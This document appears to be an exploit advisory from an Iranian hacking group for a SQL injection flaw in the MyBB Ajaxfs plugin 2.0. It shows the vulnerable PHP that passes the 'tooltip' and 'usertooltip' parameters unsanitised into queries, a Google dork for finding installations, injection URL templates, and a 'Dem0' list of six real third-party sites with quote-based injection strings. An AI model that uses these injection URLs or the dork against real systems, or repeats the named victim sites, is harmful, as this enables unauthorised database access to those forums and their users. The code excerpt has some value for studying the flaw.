Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.

1. Sql Injection vulnerability In Mybb Ajaxfs Plugin Version 2.0
2.  
3. #################################
4. #
5. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
6. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
7. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
8. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
9. # @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
10. # @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
11. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
12. # @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
13. # @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
14. #
15. #####################################
16.  
17. # Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability
18.  
19. # Author : Iranian Exploit DataBase
20.  
21. # Discovered By : IeDb
22.  
23. # Email : IeDb.Team (at) Gmail (dot) com [email concealed] - o0_iedb_0o (at) yahoo (dot) com [email concealed]
24.  
25. # Home : http://iedb.ir - http://iedb.ir/acc
26.  
27. # Fb Page : https://www.facebook.com/pages/Exploit-And-Security-Team-iedbir/19926686
28. 0256538
29.  
30. # Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2
31.  
32. # Security Risk : High
33.  
34. # Tested on : Linux
35.  
36. # Dork : inurl:ajaxfs.php
37.  
38. #################################
39.  
40. 1)
41.  
42. if(isset($_GET['tooltip']))
43. {
44. $pid=$_GET['tooltip'];
45. $query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");
46.  
47.  
48. 2)
49.  
50. if(isset($_GET['usertooltip']))
51. {
52. $uid=$_GET['usertooltip'];
53. $query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");
54.  
55. http://localhost/Upload/ajaxfs.php?usertooltip=1'
56.  
57. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
58.  
59. Google DORK : inurl:ajaxfs.php
60.  
61.  
62. # Exploit :
63.  
64. # http://site.com/mybb/ajaxfs.php?tooltip=[sql]
65.  
66. # http://site.com/mybb/ajaxfs.php?usertooltip=[sql]
67.  
68. # Dem0 :
69.  
70. # http://www.forum.birahy.com/ajaxfs.php?tooltip=mostreffer'
71.  
72. # http://www.tamishe.ir/ajaxfs.php?tooltip=mostreffer'
73.  
74. # http://www.opencartvn.com/forum/ajaxfs.php?tooltip=mostreffer'
75.  
76. # http://freenimbuzz.takbb.com/_mybb_/ajaxfs.php?tooltip='
77.  
78. # http://dvlottery.us/ajaxfs.php?tooltip=13349'
79.  
80. # http://www.taltallon.com/forum/ajaxfs.php?tooltip=mostreffer'
81.  
82. #################################
83.  
84. # Tnx To : All Member In Iedb.ir/acc & Iranian Hackers
85.  
86. #################################
87.  
88. # Exploit Archive = http://www.iedb.ir/exploits-889.html
89.  
90. #################################